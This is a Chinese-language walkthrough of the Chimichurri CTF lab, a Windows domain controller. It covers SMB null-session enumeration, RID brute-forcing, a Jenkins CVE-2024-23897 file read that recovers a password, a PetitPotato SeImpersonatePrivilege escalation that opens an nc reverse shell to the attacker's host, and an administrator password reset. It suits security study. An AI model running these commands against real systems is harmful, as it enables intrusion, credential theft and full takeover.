TheHackersLabs Chimichurri Walkthrough

靶场:The Hackers Labs
地址:https://thehackerslabs.com/chimichurri/
系统:windows
内容:smb信息检索、jenkins漏洞利用、SeImpersonatePrivilege提权

这个机器在我的virtualbox上不识别网络,还是用的vmware跑的。
扫一下端口,开了smb、还有个jenkins在6969。

─$ nmap -sV -sC -Pn -p- -oN port.log $IP                                                                                                                                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 16:29 CST                                                                                                            
Nmap scan report for 192.168.56.152                                                                                                                                           
Host is up (0.0020s latency).                                                                                                                                                 
Not shown: 65511 closed tcp ports (reset)                                                                                                                                     
PORT      STATE SERVICE       VERSION                                                                                                                                         
53/tcp    open  domain        Simple DNS Plus                                                                                                                                 
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-08 14:30:28Z)                                                                                  
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                                           
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                   
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: chimichurri.thl, Site: Default-First-Site-Name)                                                
445/tcp   open  microsoft-ds?                                                                                                                                                 
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: chimichurri.thl, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0 
|_http-title: Not Found
6969/tcp  open  http          Jetty 10.0.11 
|_http-title: Panel de control [Jenkins]
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(10.0.11)
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0 
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 00:0C:29:30:56:DF (VMware)
Service Info: Host: CHIMICHURRI; OS: Windows; CPE: cpe:/o:microsoft:windows

查一下smb权限,默认就可以读取drogas目录。

└─$ crackmapexec smb $IP -u 'null' -p '' --shares
SMB         192.168.56.152  445    CHIMICHURRI      [*] Windows 10 / Server 2016 Build 14393 x64 (name:CHIMICHURRI) (domain:chimichurri.thl) (signing:True) (SMBv1:False)
SMB         192.168.56.152  445    CHIMICHURRI      [+] chimichurri.thl\null: 
SMB         192.168.56.152  445    CHIMICHURRI      [+] Enumerated shares
SMB         192.168.56.152  445    CHIMICHURRI      Share           Permissions     Remark
SMB         192.168.56.152  445    CHIMICHURRI      -----           -----------     ------
SMB         192.168.56.152  445    CHIMICHURRI      ADMIN$                          Admin remota
SMB         192.168.56.152  445    CHIMICHURRI      C$                              Recurso predeterminado
SMB         192.168.56.152  445    CHIMICHURRI      drogas          READ            
SMB         192.168.56.152  445    CHIMICHURRI      IPC$            READ            IPC remota
SMB         192.168.56.152  445    CHIMICHURRI      NETLOGON                        Recurso compartido del servidor de inicio de sesión 
SMB         192.168.56.152  445    CHIMICHURRI      SYSVOL                          Recurso compartido del servidor de inicio de sesión

以空账户登录smb,下载一个关于账号的文件。

└─$ smbclient //$IP/drogas -U 'null' 
Password for [WORKGROUP\null]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Jun 27 18:20:49 2024
  ..                                  D        0  Thu Jun 27 18:20:49 2024
  credenciales.txt                    A       95  Mon Jul  1 01:19:03 2024

                7735807 blocks of size 4096. 4368143 blocks available
smb: \> get credenciales.txt
getting file \credenciales.txt of size 95 as credenciales.txt (4.2 KiloBytes/sec) (average 4.2 KiloBytes/sec)

查看下载的credenciales.txt的内容,得知了一个用户名hacker,在桌面保存了一个名为perico的文件。

└─$ cat credenciales.txt                         
Todo es mejor en con el usuario hacker, en su escritorio estan sus claves de acceso como perico

查看一下有多少用户,其中就有刚才文件里提到的hacker。

└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute
SMB         192.168.56.152  445    CHIMICHURRI      [*] Windows 10 / Server 2016 Build 14393 x64 (name:CHIMICHURRI) (domain:chimichurri.thl) (signing:True) (SMBv1:False)
SMB         192.168.56.152  445    CHIMICHURRI      [+] chimichurri.thl\anonymous: (Guest)
SMB         192.168.56.152  445    CHIMICHURRI      498: CHIMICHURRI0\Enterprise Domain Controllers de sólo lectura (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      500: CHIMICHURRI0\Administrador (SidTypeUser)
SMB         192.168.56.152  445    CHIMICHURRI      501: CHIMICHURRI0\Invitado (SidTypeUser)
SMB         192.168.56.152  445    CHIMICHURRI      502: CHIMICHURRI0\krbtgt (SidTypeUser)
SMB         192.168.56.152  445    CHIMICHURRI      503: CHIMICHURRI0\DefaultAccount (SidTypeUser)
SMB         192.168.56.152  445    CHIMICHURRI      512: CHIMICHURRI0\Admins. del dominio (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      513: CHIMICHURRI0\Usuarios del dominio (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      514: CHIMICHURRI0\Invitados del dominio (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      515: CHIMICHURRI0\Equipos del dominio (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      516: CHIMICHURRI0\Controladores de dominio (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      517: CHIMICHURRI0\Publicadores de certificados (SidTypeAlias)
SMB         192.168.56.152  445    CHIMICHURRI      518: CHIMICHURRI0\Administradores de esquema (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      519: CHIMICHURRI0\Administradores de empresas (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      520: CHIMICHURRI0\Propietarios del creador de directivas de grupo (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      521: CHIMICHURRI0\Controladores de dominio de sólo lectura (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      522: CHIMICHURRI0\Controladores de dominio clonables (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      525: CHIMICHURRI0\Protected Users (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      526: CHIMICHURRI0\Administradores clave (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      527: CHIMICHURRI0\Administradores clave de la organización (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      553: CHIMICHURRI0\Servidores RAS e IAS (SidTypeAlias)
SMB         192.168.56.152  445    CHIMICHURRI      571: CHIMICHURRI0\Grupo de replicación de contraseña RODC permitida (SidTypeAlias)
SMB         192.168.56.152  445    CHIMICHURRI      572: CHIMICHURRI0\Grupo de replicación de contraseña RODC denegada (SidTypeAlias)
SMB         192.168.56.152  445    CHIMICHURRI      1000: CHIMICHURRI0\hacker (SidTypeUser)
SMB         192.168.56.152  445    CHIMICHURRI      1001: CHIMICHURRI0\CHIMICHURRI$ (SidTypeUser)
SMB         192.168.56.152  445    CHIMICHURRI      1102: CHIMICHURRI0\DnsAdmins (SidTypeAlias)
SMB         192.168.56.152  445    CHIMICHURRI      1103: CHIMICHURRI0\DnsUpdateProxy (SidTypeGroup)
SMB         192.168.56.152  445    CHIMICHURRI      1107: CHIMICHURRI0\Remote Mangement Users (SidTypeGroup)

下面要利用jenkins的漏洞来读取文件。在exploit-db搜索一下,有个可用的CVE。

利用代码在https://github.com/godylockz/CVE-2024-23897可以下载。由于不知道扩展名,我们利用脚本进行循环查找,最后发现是.txt文件。

└─$ while IFS= read -r line; do echo -n "perico.$line  ";python3 jenkins_fileread.py -u $IP:6969 -f c:/Users/Hacker/Desktop/perico.$line ; done < /usr/share/seclists/Fuzzing/
extensions-most-common.fuzz.txt                                                                                                                                               
perico.asp  File does not exist                                                                                                                                               
perico.aspx  File does not exist                                                                                                                                              
perico.phar  File does not exist                                                                                                                                              
perico.php  File does not exist                                                                                                                                               
perico.php3  File does not exist                                                                                                                                              
perico.php4  File does not exist                                                                                                                                              
perico.php5  File does not exist                                                                                                                                              
perico.txt  hacker:Perico69                                                                                                                                                   
perico.shtm  File does not exist
perico.shtml  File does not exist
perico.phtm  File does not exis

利用得到的用户名和密码,登录shell,查看权限。

└─$ evil-winrm -i $IP -u  hacker -p Perico69                               

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\hacker\Documents> whoami /priv

INFORMACIàN DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripci¢n                                  Estado
============================= ============================================ ==========
SeMachineAccountPrivilege     Agregar estaciones de trabajo al dominio     Habilitada
SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido             Habilitada
SeImpersonatePrivilege        Suplantar a un cliente tras la autenticaci¢n Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada

问了下gpt,看来要利用SeImpersonatePrivilege权限提权。

在这三个权限中,SeImpersonatePrivilege 可以被滥用来提升普通用户权限。
权限解释

    SeMachineAccountPrivilege
        允许用户添加计算机账户到域中。
        主要适用于域控制环境,与权限提升关系不大。

    SeImpersonatePrivilege
        允许用户模拟其他用户的安全上下文(即扮演其他用户的身份)。
        在某些情况下,特别是在服务进程或本地系统账户中运行的应用程序上,可能存在已知漏洞,允许攻击者利用此权限来获得更高权限(例如 NT AUTHORITY\SYSTEM 权限)。
        一些常见的利用工具(如 Juicy Potato、Rogue Potato、PrintSpoofer 等)会利用这种权限来进行提权操作。

    SeIncreaseWorkingSetPrivilege
        允许用户调整进程的工作集大小(内存管理方面的权限)。
        该权限与内存优化相关,不直接涉及权限提升。

SeImpersonatePrivilege权限的利用,都是各种以Potato结尾的代码,试了一圈,就这个好使。
https://github.com/wh0amitz/PetitPotato

*Evil-WinRM* PS C:\Users\hacker\Documents> .\PetitPotato.exe 3 "nc64.exe 192.168.56.101 1234 -e cmd"

[+] Malicious named pipe running on \\.\pipe\petit\pipe\srvsvc.
[+] Invoking EfsRpcQueryUsersOnFile with target path: \\localhost/pipe/petit\C$\wh0nqs.txt.

[+] The connection is successful.
[+] ImpersonateNamedPipeClient OK.
[+] OpenThreadToken OK.
[+] DuplicateTokenEx OK.
[+] CreateProcessAsUser OK.

本地监听,得到反弹shell。

─$ nc -nlvp 1234                                                                                                                                                             
listening on [any] 1234 ...                                                                                                                                                   
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.152] 50012                                                                                                             
Microsoft Windows [Versin 10.0.14393]                                                                                                                                         
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami
whoami
nt authority\system

这时还不能直接读取flag,因为文件权限设定是只有Administrator能读取。可以修改administrator(注意西班牙语的名称)的密码。

c:\Users\hacker\Desktop>net user administrador Pass1234!
net user administrador Pass1234!
Se ha completado el comando correctamente.

└─$ evil-winrm -i $IP -u  administrador -p Pass1234!

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrador\Documents> whoami
chimichurri0\administrador

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注